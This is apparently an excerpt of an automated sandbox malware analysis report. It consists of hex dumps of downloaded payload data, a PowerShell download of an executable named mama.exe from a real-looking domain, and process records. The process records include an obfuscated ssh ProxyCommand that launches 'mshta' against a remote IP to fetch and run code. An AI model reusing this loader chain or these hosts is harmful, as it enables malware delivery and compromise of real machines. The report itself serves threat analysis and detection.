                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 9f 22 19 44 72 46 dd c0 c5 26 a1 a7 de 5d 5f c7 3a 79 4a 23 c6 32 c7 9c 1c d3 af 34 fb bd 42 44 13 c9 1c 71 27 38 4c 9c d3 b0 17 65 63 75 a7 b3 5b be d3 22 65 58 f6 ac 1b 92 13 4b 8c 05 0d 24 6f 86 95 7a 67 9e 33 de b7 a7 b5 dd a7 b5 b4 2d b3 e4 da a6 b3 4e 95 79 26 9a 2d 9e 68 c6 d3 95 00 7f 33 48 0d 5b 72 64 b4 8c bf 25 90 67 3d f8 ac 9d 05 01 6b c0 54 11 9c 7e 15 ab 6b 1c 91 59 a4 6e 55 9d 57 19 1d 2b 3a ce c2 fe d1 e5 28 f0 9f 30 e4 e7 34 01 1e 82 aa 63 bc ef f3 63 a7 6a 7f 86 c7 ee 67 38 e7 cc c5 2d 8e 9d 7d 66 25 0b 2c 24 48 72 72 0d 58 d2 6c 66 b1 12 89 24 57 0e 73 c0 e9 40 14 b5 26 f2 f5 fb 77 54 2c db 01 da 3a 9e 4d 49 02 5a ea c6 4f 3c 30 99 5f 71 1d 08 1d 00 ab 57 3a 71 9f 51 8a ec 4d b4 c6 00 0b b7 34 92 69 60 ea 1f 6c 86 66 89 b1 c8 03 20 d0
                                                                      Data Ascii: "DrF&]_:yJ#24BDq'8Lecu["eXK$ozg3-Ny&-h3H[rd%g=kT~kYnUW+:(04ccjg8-}f%,$HrrXlf$Ws@&wT,:MIZO<0_qW:qQM4i`lf
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 92 26 85 e5 b7 76 dc 8c 83 24 7b 1a b3 6d 03 cb 7e d7 d2 a1 4f 97 64 68 7a e3 d4 d0 05 2b 4b 28 64 d6 2f 63 61 fb b5 da 42 0e 9d 29 e9 02 e9 fa e4 6b 08 db 14 ea 72 be 84 50 b3 3c 1a d5 d9 48 5a 50 54 6e 0b d7 a5 58 b7 8e 6b ab f1 77 3c 46 24 45 db 1a 37 5e 7a 93 40 11 e9 0d f6 89 6e ae 24 e5 fc cd a3 3d 87 a5 46 c3 ec da f4 42 3f 95 66 07 70 15 20 86 e3 4f bb 9a 48 63 f3 a0 94 e4 aa 9e 54 d2 c1 14 97 1a 82 dd 4c 9e 5e c1 85 42 79 fc 68 02 cd e2 ab 4d 6a 0a 82 de 6f 1f 91 a8 5d 40 d7 a2 38 e4 c2 69 91 5c cd 77 71 f6 88 ad 59 a2 8f 2a 99 60 32 7b 9a 6d c1 b9 4b f8 ef 1e dc f9 71 a9 56 0a c0 9f ad 00 6b 51 48 08 20 11 d0 d4 77 42 63 6e e2 d8 81 2e 3e 52 68 03 1a e1 26 d3 af dd 6d d4 98 ee c6 14 7f 75 ab 6a de 21 0c 09 10 e8 a3 15 4e d2 0b b9 64 8e 6b f2 bb
                                                                      Data Ascii: &v${m~Odhz+K(d/caB)krP<HZPTnXkw<F$E7^z@n$=FB?fp OHcTL^ByhMjo]@8i\wqY*`2{mKqVkQH wBcn.>Rh&muj!Ndk
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 03 e5 a8 f4 29 24 68 e6 53 16 d4 f3 58 ee dd df d3 15 ab 50 5b da c7 6e 8e 91 e7 0e c5 8e 4f 73 40 11 ea 16 90 dd 40 4c a4 82 a0 90 c0 f4 a3 4b 67 7d 3a 13 21 c9 c7 5f 51 4c 4d 2a dd 46 37 4a c9 9c ec 2e 71 57 40 0a 00 03 00 70 05 00 2d 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05
                                                                      Data Ascii: )$hSXP[nOs@@LKg}:!_QLM*F7J.qW@p-Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 28 a2 8a 00 28 a2 8a 00 29 1b a7 e3 4b 48 dd 3f 11 40 0b 45 54 d4 e5 9a 1b 37 96 06 0a 50 64 e4 66 a6 b6 73 25 b4 4e c7 25 94 13 f9 50 04 b4 54 53 5c 47 0b c6 8c 7e 69 1b 6a 8a 24 b8 48 e5 8e 26 3f 34 87 00 50 04 b5 5a f2 c9 2f 15 56 47 70 14 e4 05 3d ea ce 45 20 60 dd 08 3f 43 40 09 1a ec 40 bb 8b 63 b9 eb 4e a4 0c 09 20 10 48 ea 2a b4 ee cf 7d 04 2a 48 03 32 36 0f 6e 80 50 05 aa 86 eb fd 49 a8 6e 37 4d 78 90 24 8c 81 14 bb 15 f7 e0 7f 5a a9 63 2b 1d 3e 63 2c 85 f6 ca 46 e6 34 01 7e cf ee 1a b1 55 2c a5 43 0b 1d c0 01 d4 e7 a5 4d 1d cc 12 b6 d8 e5 46 6f 40 68 01 65 fb f1 7f bf fd 0d 2c bf ea db e9 59 f3 a9 4d 6e 12 19 88 75 24 82 78 14 fb 84 81 f5 05 7f b4 62 55 42 3c b0 68 02 54 51 e7 23 01 ce 07 35 6e b3 fe d3 12 30 2d 22 80 a3 9e 7a 55 b8 6e 61 9e 33
                                                                      Data Ascii: (()KH?@ET7Pdfs%N%PTS\G~ij$H&?4PZ/VGp=E `?C@@cN H*}*H26nPIn7Mx$Zc+>c,F4~U,CMFo@he,YMnu$xbUB<hTQ#5n0-"zUna3
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 0a 28 a2 80 0a 28 a2 80 0a 28 a3 bd 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 07 a5 44 bf eb 4d 4b 51 0f f5 c6 80 25 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                                      Data Ascii: (((QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEDMKQ%((((((((((
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: b2 9e 40 a0 0a 77 e7 ec 90 c5 22 ce e6 e0 10 58 17 cf 6f 4a d3 b8 5f 3a cf 25 99 7e 50 df 29 c5 63 6a 13 59 1d 39 52 d5 83 1c e5 b8 e7 a7 73 57 86 a7 69 f6 54 8b cd f9 99 30 3e 53 c9 c5 00 56 bc 56 8a d0 c8 92 3e e2 33 9c f4 ab 57 70 ed d2 0b ac 92 07 54 dc 1b 79 ce 6a be a7 84 d3 f0 48 ce d1 56 27 b8 85 b4 36 6f 31 48 31 60 73 df 1d 28 02 23 b2 3d 15 59 9e 46 92 44 dc 30 e7 25 b1 fc aa 4d 2e 04 9b 4b 06 42 ec 64 1f 31 2c 73 50 e9 fe 57 f6 53 4f 2c 81 d9 62 29 fe e0 c7 4a 9b 44 9e 3f ec b5 05 c0 f2 f3 bb 3d a8 02 b6 92 f6 c9 14 c2 e2 61 bf 71 4f 9d ff 00 86 9f a4 c7 0b df dd 32 1d ea 8d f2 1c e4 01 46 8a 60 7f b4 2b 28 2d e6 16 19 5f e1 a5 d3 65 8d 75 5b b5 50 55 5c fc bc 60 1a 03 51 22 b7 86 3d 7e 45 da 02 08 b7 e0 f4 07 3d 6a 19 04 57 1a dc 24 45 88 9f
                                                                      Data Ascii: @w"XoJ_:%~P)cjY9RsWiT0>SVV>3WpTyjHV'6o1H1`s(#=YFD0%M.KBd1,sPWSO,b)JD?=aqO2F`+(-_eu[PU\`Q"=~E=jW$E
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 53 64 fb a3 ea 29 d4 d9 3e ef e2 28 01 d4 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 15 52 6b eb 5f 2d 87 da 23 cf a6 ea b7 58 9a 84 6a 35 a8 70 a3 e6 4e 78 fa d0 05 9b 1b cb 74 46 0f 2a a9 27 8c 9a b4 97 d6 b2 38 44 99 59 89 c0 02 a1 d3 51 7c b7 f9 47 5f 4a af a2 85 59 ef 30 00 c4 87 fa d0 06 84 ff 00 eb 21 ff 00 7f fa 1a 7c df ea 5f e8 6a 9d c5 fd b7 9f 1a 89 94 94 6c b6 3a 0e 29 cb a8 5b 5d 24 89 0c 99 60 a7 8c 62 80 1d ff 00 2d 22 fc 3f 95 5b ac d6 bc 88 48 9c b7 cb 8c 8d a6 a7 9f 52 b7 b7 90 24 85 c3 1e 83 61 e6 80 2d d1 50 4d 77 1c 36 e2 77 57 d8 7d 17 91 f5 aa f2 6a d0 c6 01 78 a6 55 27 00 94 eb 40 17 e8 a8 1a ea 34 b5 fb 44 81 91 71 d1 87 35 58 ea 82 3d ad
                                                                      Data Ascii: QEQEQEQEQEQEQESd)>(QEQEQEQERk_-#Xj5pNxtF*'8DYQ|G_JY0!|_jl:)[]$`b-"?[HR$a-PMw6wW}jxU'@4Dq5X=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.749731150.241.97.104437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-27 08:05:27 UTC56OUTGET /mama.exe HTTP/1.1
                                                                      Host: pravo-bashkortostan.ru
                                                                      2024-12-27 08:05:28 UTC273INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Dec 2024 08:05:27 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      Last-Modified: Mon, 23 Dec 2024 10:31:56 GMT
                                                                      ETag: "414400-629ed81723f00"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 4277248
                                                                      Connection: close
                                                                      Content-Type: application/x-msdos-program
                                                                      2024-12-27 08:05:28 UTC7919INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: 40 00 01 00 00 00 00 02 00 fc 2a 40 00 14 09 50 56 61 72 41 72 72 61 79 10 2b 40 00 02 00 00 00 00 14 2b 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 cc 2a 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 a8 2b 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 f0 2b
                                                                      Data Ascii: @*@PVarArray+@+@TVarArray@DimCount@Flags@ElementSize@LockCount@Data*@Bounds+@TVarRecord@PRecord@RecInfo+
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: 00 00 02 00 00 38 4a 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 10 4a 40 00 02 00 00 00 50 4a 40 00 14 10 50 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 68 4a 40 00 02 00 6c 4a 40 00 0e 10 54 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 10 00 00 00 00 00 00 00 00 04 00 00 00 9c 10 40 00 00 00 00 00 02 09 54 79 70 65 43 6f 75 6e 74 02 00 34 4a 40 00 04 00 00 00 02 09 54 79 70 65 54 61 62 6c 65 02 00 9c 10 40 00 08 00 00 00 02 09 55 6e 69 74 43 6f 75 6e 74 02 00 34 29 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 e8 4a 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06 53 79 73 74 65 6d b4 10 40 00 02 00 00 00 20 4b 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65
                                                                      Data Ascii: 8J@PTypeTableJ@PJ@PPackageTypeInfohJ@lJ@TPackageTypeInfo@TypeCount4J@TypeTable@UnitCount4)@UnitNamesJ@TArray<System.Byte>@System@ K@TArray<Syste
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: ff 0f b7 00 83 e8 04 89 85 e4 47 fe ff c6 85 f6 47 fe ff 00 bf ff 00 00 00 8b 85 dc 47 fe ff 8b f0 8d 85 db ff fd ff 3b d8 0f 87 2c 01 00 00 83 3e 00 0f 86 16 01 00 00 80 bd f7 47 fe ff 00 75 21 a1 58 f0 7e 00 e8 6a 37 00 00 8b c8 8b d3 a1 58 f0 7e 00 e8 c4 f9 ff ff 8b d8 c6 85 f7 47 fe ff 01 80 bd f6 47 fe ff 00 75 56 c6 03 0d 43 c6 03 0a 43 8b 85 e8 47 fe ff 40 8b d3 e8 4c f9 ff ff 8b d8 c6 03 20 43 c6 03 2d 43 c6 03 20 43 8b d3 8b 85 e4 47 fe ff e8 31 f9 ff ff 8b d8 a1 60 f0 7e 00 e8 0d 37 00 00 8b c8 8b d3 a1 60 f0 7e 00 e8 67 f9 ff ff 8b d8 c6 85 f6 47 fe ff 01 eb 08 c6 03 2c 43 c6 03 20 43 8b c7 83 e8 01 72 07 74 21 48 74 3a eb 54 a1 64 f0 7e 00 e8 d4 36 00 00 8b c8 8b d3 a1 64 f0 7e 00 e8 2e f9 ff ff 8b d8 eb 44 a1 68 f0 7e 00 e8 b8 36 00 00 8b c8
                                                                      Data Ascii: GGG;,>Gu!X~j7X~GGuVCCG@L C-C CG1`~7`~gG,C Crt!Ht:Td~6d~.Dh~6
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: c3 53 56 57 55 83 c4 f0 8b fa 8b f0 8b 6e 10 8b c6 e8 77 04 00 00 88 04 24 80 3c 24 00 0f 85 67 01 00 00 85 ff 0f 84 5f 01 00 00 c6 44 24 01 00 85 ed 0f 8e 92 00 00 00 e8 2c c9 ff ff 89 44 24 04 33 c0 89 44 24 0c 85 ed 7e 5a 83 ff ff 74 16 e8 14 c9 ff ff 2b 44 24 04 3b f8 77 09 c6 04 24 00 e9 24 01 00 00 83 3e 01 7f 3a 83 3e 00 75 27 33 c0 ba 01 00 00 00 f0 0f b1 16 85 c0 75 18 e8 c5 c7 ff ff 89 46 08 c7 46 04 01 00 00 00 c6 04 24 01 e9 f3 00 00 00 8d 44 24 0c e8 1d fc ff ff 4d 85 ed 7f a6 83 ff ff 74 20 e8 ba c8 ff ff 89 44 24 08 8b 44 24 08 2b 44 24 04 3b f8 77 09 c6 04 24 00 e9 c2 00 00 00 2b f8 8b 1e 85 db 0f 84 3b ff ff ff 8d 53 02 8b c3 f0 0f b1 16 3b d8 75 e9 e8 83 c8 ff ff 89 44 24 04 8b c6 e8 08 01 00 00 8b d0 8b 1d fc 78 7f 00 8b cf 33 c0 ff 53
                                                                      Data Ascii: SVWUnw$<$g_D$,D$3D$~Zt+D$;w$$>:>u'3uFF$D$Mt D$D$+D$;w$+;S;uD$x3S
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: ff c3 8d 40 00 31 c9 85 d2 74 13 0f b7 4a f4 ff 34 24 89 4c 24 04 8b 4a fc e9 5b f6 ff ff e9 ea f6 ff ff c3 90 31 c9 85 d2 74 05 8b 4a fc d1 e9 e9 b8 f5 ff ff c3 8d 40 00 31 c9 85 d2 74 03 8b 4a fc e9 d6 f5 ff ff c3 90 53 56 81 c4 00 fe ff ff 8b d9 8b f0 81 fb ff 00 00 00 7e 05 bb ff 00 00 00 8b c2 85 c0 74 05 83 e8 04 8b 00 3b d8 7f 02 8b c3 85 c0 75 04 33 c0 eb 1f 50 8d 44 24 04 8b ca ba ff 01 00 00 e8 29 f5 ff ff 85 c0 7d 04 33 c0 eb 06 3b d8 7d 02 8b c3 88 06 85 c0 7e 0b 8d 56 01 8b cc 91 e8 62 c7 ff ff 81 c4 00 02 00 00 5e 5b c3 90 31 c9 8a 0a 42 e9 4e f6 ff ff c3 90 53 56 57 89 c3 89 d6 31 ff 85 d2 7e 64 8b 03 85 c0 74 3d 83 78 f8 01 75 37 83 e8 0c 01 d2 70 2b 83 c2 0e 70 26 50 89 e0 e8 af c5 ff ff 58 83 c0 0c 89 03 89 70 fc 66 c7 04 70 00 00 85 ff
                                                                      Data Ascii: @1tJ4$L$J[1tJ@1tJSV~t;u3PD$)}3;}~Vb^[1BNSVW1~dt=xu7p+p&PXpfp
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: e9 00 cb ff ff eb eb 5e 5b 8b e5 5d c3 b0 04 02 00 ff ff ff ff 01 00 00 00 2c 00 00 00 55 8b ec 81 c4 98 fe ff ff 53 56 57 33 c9 89 8d a0 fe ff ff 89 8d 9c fe ff ff 89 8d 98 fe ff ff 89 55 fc 8b f0 33 c0 55 68 b1 c8 40 00 64 ff 30 64 89 20 8b 45 fc e8 cd d4 ff ff 66 3b 35 00 fa 7e 00 72 54 66 3b 35 00 fc 7e 00 77 4b bf 40 00 00 00 33 c0 89 45 f8 3b 7d f8 72 3c 8b df 03 5d f8 d1 eb 66 3b 34 dd 00 fa 7e 00 73 05 8b fb 4f eb 21 66 3b 34 dd 00 fa 7e 00 76 06 43 89 5d f8 eb 11 8b 55 fc 8b 04 dd 04 fa 7e 00 e8 8f fe ff ff eb 05 3b 7d f8 73 c4 8b 45 fc 83 38 00 0f 85 a3 00 00 00 6a 02 0f b7 c6 50 e8 b5 89 ff ff 85 c0 0f 84 90 00 00 00 6a 55 8d 85 4e ff ff ff 50 6a 59 0f b7 de 53 e8 79 89 ff ff 6a 55 8d 85 a4 fe ff ff 50 6a 5a 53 e8 68 89 ff ff 8d 85 a0 fe ff ff
                                                                      Data Ascii: ^[],USVW3U3Uh@d0d Ef;5~rTf;5~wK@3E;}r<]f;4~sO!f;4~vC]U~;}sE8jPjUNPjYSyjUPjZSh
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: 68 d1 e6 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 86 fa ff ff 89 45 ec 83 7d ec 00 75 1f 8b 45 fc 8b d3 e8 ff fb ff ff 8b d8 8b 45 fc 8d 04 b0 8b cb 8b 55 f0 e8 a1 f9 ff ff 89 5d ec 33 c0 5a 59 59 64 89 10 68 d8 e6 40 00 8b 45 f4 8d 04 40 8b 55 fc 8d 04 82 e8 6c fb ff ff c3 e9 5e ab ff ff eb e7 8b 45 ec 89 45 e8 8b 45 e8 8d 90 84 00 00 00 8b 45 e8 8b 4d f8 e8 9a f7 ff ff 5e 5b 8b e5 5d c3 55 8b ec 83 c4 e8 53 56 8b d9 89 55 f8 89 45 fc 8b 45 fc 80 b8 48 09 00 00 00 0f 84 8f 00 00 00 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 04 b0 e8 94 fa ff ff 33 d2 55 68 80 e7 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 b2 f9 ff ff 89 45 ec 33 c0 5a 59 59 64 89 10 68 87 e7 40 00
                                                                      Data Ascii: h@d2d"EME}uEEU]3ZYYdh@E@Ul^EEEEM^[]USVUEEHUu4vE3Uh@d2d"EME3ZYYdh@
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: 8d 7d a8 89 55 e8 56 be 5c fc 7e 00 b9 09 00 00 00 f3 a5 5e 89 75 ac 8b 45 0c 89 45 b0 8b 55 d0 89 55 b4 f6 45 cc 01 75 28 8b 0d 80 fc 7e 00 89 4d fc 8d 45 a8 89 45 fc 8d 55 fc 52 6a 01 6a 00 68 57 00 6d c0 e8 1b f9 ff ff 33 c0 e9 10 02 00 00 8b 55 d4 8b 45 0c 2b 45 d8 85 c0 8b 1a 79 03 83 c0 03 c1 f8 02 89 45 f8 8b 45 f8 8b f8 c1 e7 02 03 7d dc f6 47 03 80 0f 94 c0 83 e0 01 89 45 b8 85 c0 74 11 8b 17 52 e8 f0 03 00 00 59 83 c0 02 89 45 bc eb 0b 8b 0f 81 e1 ff ff 00 00 89 4d bc 33 ff 83 3d 34 a6 7f 00 00 74 17 8d 45 a8 50 6a 00 ff 15 34 a6 7f 00 8b f8 85 ff 74 05 e9 7c 01 00 00 85 db 0f 85 bc 00 00 00 83 3d 34 a6 7f 00 00 74 0e 8d 45 a8 50 6a 01 ff 15 34 a6 7f 00 8b d8 85 db 75 0b 8b 45 b4 50 e8 6e f8 ff ff 8b d8 85 db 75 4b e8 5b f8 ff ff 89 45 c8 83 3d
                                                                      Data Ascii: }UV\~^uEEUUEu(~MEEURjjhWm3UE+EyEE}GEtRYEM3=4tEPj4t|=4tEPj4uEPnuK[E=
                                                                      2024-12-27 08:05:28 UTC8000INData Raw: 41 00 8b 03 50 e8 d7 f7 ff ff a3 60 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 c5 f7 ff ff a3 64 a6 7f 00 68 18 27 41 00 8b 03 50 e8 b3 f7 ff ff a3 68 a6 7f 00 68 40 27 41 00 8b 03 50 e8 a1 f7 ff ff a3 6c a6 7f 00 68 c4 26 41 00 8b 03 50 e8 8f f7 ff ff a3 70 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 7d f7 ff ff a3 74 a6 7f 00 68 6c 27 41 00 8b 03 50 e8 6b f7 ff ff a3 78 a6 7f 00 68 98 27 41 00 8b 03 50 e8 59 f7 ff ff a3 7c a6 7f 00 68 b8 27 41 00 8b 03 50 e8 47 f7 ff ff a3 80 a6 7f 00 68 d8 27 41 00 8b 03 50 e8 35 f7 ff ff a3 84 a6 7f 00 68 10 28 41 00 8b 03 50 e8 23 f7 ff ff a3 88 a6 7f 00 68 38 28 41 00 8b 03 50 e8 11 f7 ff ff a3 8c a6 7f 00 68 6c 28 41 00 8b 03 50 e8 ff f6 ff ff a3 90 a6 7f 00 68 a0 28 41 00 8b 03 50 e8 ed f6 ff ff a3 94 a6 7f 00 68 c8 28 41 00 8b
                                                                      Data Ascii: AP`h&APdh'APhh@'APlh&APph&AP}thl'APkxh'APY|h'APGh'AP5h(AP#h8(APhl(APh(APh(A


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:1
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
                                                                      Imagebase:0x7ff7c9110000
                                                                      File size:946'176 bytes
                                                                      MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:03:05:06
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:03:05:08
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\mshta.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
                                                                      Imagebase:0x7ff7f9390000
                                                                      File size:14'848 bytes
                                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:03:05:09
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7b4ee0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:16
                                                                      Start time:03:05:13
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
